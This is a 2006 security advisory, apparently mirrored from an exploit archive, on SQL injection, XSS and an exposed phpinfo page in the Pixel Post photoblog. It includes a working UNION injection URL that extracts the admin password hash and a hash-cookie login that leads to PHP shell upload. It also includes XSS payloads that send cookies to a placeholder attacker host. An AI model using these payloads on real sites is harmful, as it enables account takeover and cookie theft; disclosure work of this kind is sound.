exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

adv_pixelpost.txt

adv_pixelpost.txt
Posted Mar 8, 2006
Authored by Paisterist, Knightmare | Site neosecurityteam.net

Pixel Post versions 1.4.3 and 1.5 beta1 have been found susceptible to SQL injection and cross site scripting attacks.

tags | exploit, xss, sql injection
SHA-256 | 380878565a9c6bdabddd71ab710ce332a7eb9c1947b4866d464de3d52a1c8c38

adv_pixelpost.txt

Change Mirror Download
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]� - Advisory #19 - 04/03/06
--------------------------------------------------------
Program: Pixel Post
Homepage: http://www.pixelpost.org/
Vulnerable Versions: 1.4.3, 1.5 beta1 and possibly lower versions.
Risk: High!
Impact: XSS, and SQL Injection providing full access to admin area, providing upload any type of files capabilities.. :D

-==Pixel Post Multiple Vulnerabilities ==-
---------------------------------------------------------

- Description
---------------------------------------------------------
Pixelpost is a photoblog application powered by PHP and MySQL. It's developed and maintained by photobloggers who like to keep the meaning behind photoblogging in mind, the photography, and not about the 311 hacks you would have to get through to get your regular blog to work like...

- Tested
---------------------------------------------------------
localhost + many sites

- Explotation
---------------------------------------------------------

1)

Vulnerable code:

magic_quotes_gpc must be Off in order to exploit it.

==[ index.php 135-147 ]==========================
[...]
if($_GET['showimage'] == "") {
$row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where datetime<='$cdate' order by datetime DESC limit 0,1");
} else {
$row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where (id='".$_GET['showimage']."')");
}
if(!$row['image']) {
echo "Coming Soon! Nothing to show. No image to show here!";
exit;
}
$image_name = $row['image'];
$image_title = pullout($row['headline']);
$image_id = $row['id'];
$image_datetime = $row['datetime'];
[...]
==[ end index.php ]==========================


$showimage is the variable that is not properly sanitized (or not at all) and it's on line 138 that we can get advantage from this.

Since the application prevents PHP or MySQL Errors from being shown, we have to fetch the data replacing the one that was supposed to be fetched. So that $row[] is going to fetch what we specify and then print it on the page.

With this vulnerability we can fetch almost any data from the database, and from any tables.

PoC:
---------------------------------------------------------

http://[site]/[pixelpost_path]/?showimage=')%20UNION%20SELECT%20template%20as%20id,%20email%20as%20headline,%20admin%20as%20datetime,%20password%20as%20body,%20sitetitle%20as%20category,%20langfile%20as%20image%20FROM%20pixelpost_config/*

With this you can see on the frontpage, the username of the admin, and below resides the md5 hash of the admin.

It's not necesarry to crack it since you can log in to the admin through a cookie with the md5 hash.

pixelpost_admin=[hash]

Once having access to the admin area, you can upload any type of files, since file types or extensions are not checked.

So you can upload a PHP Shell or whatever. And depending on Server Configuration gain system access.


2)

Also by default you can see the System Configuration by viewing:

http://[site]/[pixelpost_path]/includes/phpinfo.php

==[ includes/phpinfo.php ]==========================
<?
phpinfo();
?>
==[ end includes/phpinfo.php ]======================

Which isn't restricted at all.


3)

Another SQL Injection resides when modifying the USER_AGENT, HTTP_REFERER and HTTP_HOST

The script doesn't sanitize this variables at all in includes/functions.php

==[ includes/functions.php 159-183 ]==========================
[...]
function book_visitor($str)
{
// book a visitor
$datetime = gmdate("Y-m-d H:i:s",gmdate("U")+(3600 * $cfgrow['timezone']));
$host = $_SERVER['HTTP_HOST'];
$referer = $_SERVER['HTTP_REFERER'];

// don't book a referer from self
$refererhost = parse_url($referer);
$refererhost = $refererhost['host'];
if($refererhost == $host)
{
$referer = "";
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
$ruri = $_SERVER['REQUEST_URI'];
// ### if cookie lastvisit not set, count the people!
if(!isset($_COOKIE['lastvisit']))
{
$query = "insert into $str(id,datetime,host,referer,ua,ip,ruri)
VALUES('NULL','$datetime','$host','$referer','$ua','$ip','$ruri')";
$result = mysql_query($query);
}
}
[...]
==[ end includes/functions.php ]==============================


4)

You can perform a XSS attack when commenting a post because the comment, the name, the url, and nor the email are properly sanitized.

Comment:
<img src="javascript:alert('xss')"> (IE and Opera)
<img src="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie"> (Steal cookies)

<a href="javascript:alert('xss')">sarasa</a> (IE, Opera, Mozilla and probably all major browsers, but the user must click the link in order to succed)
<a href="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie">sarasa</a> (Steal cookies)

There are lots of things you can do with a bit of imagination.



The application was not fully tested and many other vulnerabilities are probably present (Almost sure!)


- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=19

- Credits
-------------------------------------------------
Discovered by Knightmare -> mr.knightmarex [at] gmail [at] com

[ 3KLabs ] :: [ http://www.3klabs.com/ ]

And Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST]� - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
Mike
Guille
Zeus54
HaCkZaTaN
K4P0
Daemon21
Link
LINUX

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close